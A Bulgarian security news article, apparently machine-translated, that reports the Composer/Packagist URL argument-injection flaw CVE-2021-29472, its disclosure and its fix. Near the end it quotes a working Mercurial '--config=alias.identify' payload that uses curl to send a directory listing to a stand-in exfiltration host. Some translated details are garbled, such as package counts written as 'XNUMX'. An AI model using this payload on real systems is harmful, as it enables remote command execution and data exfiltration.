Уязвимост в мениджъра на пакети Composer, която позволява компрометиране на PHP хранилището на Packagist

Беше идентифицирана критична уязвимост (CVE-2021-29472) в мениджъра на зависимости на Composer, който позволява произволни команди да бъдат изпълнявани в системата при обработка на пакет със специално форматирана URL стойност, която указва адреса за изтегляне на изходния код. Проблемът възниква в компонентите GitDriver, SvnDriver и HgDriver, използвани при използване на системи за контрол на източника Git, Subversion и Mercurial. Уязвимостта беше разрешена в версии 1.10.22 и 2.0.13 на Composer.

Специално се отбелязва, че проблемът засяга предимно хранилището на пакети по подразбиране на Composer, Packagist, което съдържа 306 1.4 пакета за PHP разработчици и обслужва повече от XNUMX милиарда изтегляния на месец. Експериментът показа, че ако има информация за проблема, нападателите могат да получат контрол над инфраструктурата на Packagist и да прихванат идентификационните данни на поддържащите или да пренасочат изтеглянията на пакети към сървър на трета страна, организирайки доставката на варианти на пакети със злонамерени промени, за да заменят задната врата по време на процеса на инсталиране на зависимостта.

Опасността за крайните потребители се ограничава до факта, че съдържанието на composer.json обикновено се определя от потребителя и връзките към източника се предават при достъп до хранилища на трети страни, които обикновено са надеждни. Основният удар падна върху хранилището Packagist.org и услугата Private Packagist, която нарича Composer с прехвърляне на данни, получени от потребителите. Нападателите биха могли да изпълнят своя код на сървърите на Packagist, като поставят специално проектиран пакет.

Екипът на Packagist поправи уязвимостта в рамките на 12 часа след докладването на уязвимостта. Изследователите частно уведомиха разработчиците на Packagist на 22 април и проблемът беше отстранен същия ден. Публична актуализация на Composer, адресираща уязвимостта, беше публикувана на 27 април, като подробностите бяха разкрити на 28 април. Одитът на регистрационните файлове на сървърите на Packagist не разкри никаква подозрителна дейност, свързана с уязвимостта.

Проблемът е причинен от грешка в кода за валидиране на URL адреса в основния файл composer.json и връзките за изтегляне на източника. Грешката присъства в кода от ноември 2011 г. Packagist използва специални слоеве, за да организира зареждането на код, без да е обвързан с конкретна система за контрол на източника, които се изпълняват чрез извикване на „fromShellCommandline“ и предаване на аргументи от командния ред. Например за git се извиква командата „git ls-remote -heads $URL“, където URL адресът се обработва с помощта на метода „ProcessExecutor::escape($url)“, избягвайки потенциално опасни конструкции като „$(. ..)" или "` ...`".

Същността на проблема е, че методът ProcessExecutor::escape не е избягал от последователността „—“, което е позволило всеки допълнителен параметър за извикване да бъде указан в URL адреса. Такова избягване липсваше в драйверите GitDriver.php, SvnDriver.php и HgDriver.php. Атаката GitDriver.php беше възпрепятствана от факта, че командата „git ls-remote“ не поддържаше посочване на допълнителни аргументи след пътя. Атаката срещу HgDriver.php се оказа възможна чрез предаване на параметъра „--config“ на помощната програма „hq“, която ви позволява да организирате изпълнението на всяка команда чрез манипулиране на настройката „alias.identify“. Например, за да изтеглите и изпълните код чрез стартиране на помощната програма curl, можете да посочите: —config=alias.identify=!curl http://exfiltration-host.tld —data “$(ls -alh)”

Чрез публикуване на тестов пакет с подобен URL на Packagist, изследователите потвърдиха, че след публикуването техният сървър е получил HTTP заявка от един от сървърите на Packagist в AWS, съдържаща списък с файлове в текущата директория.

Източник: opennet.ru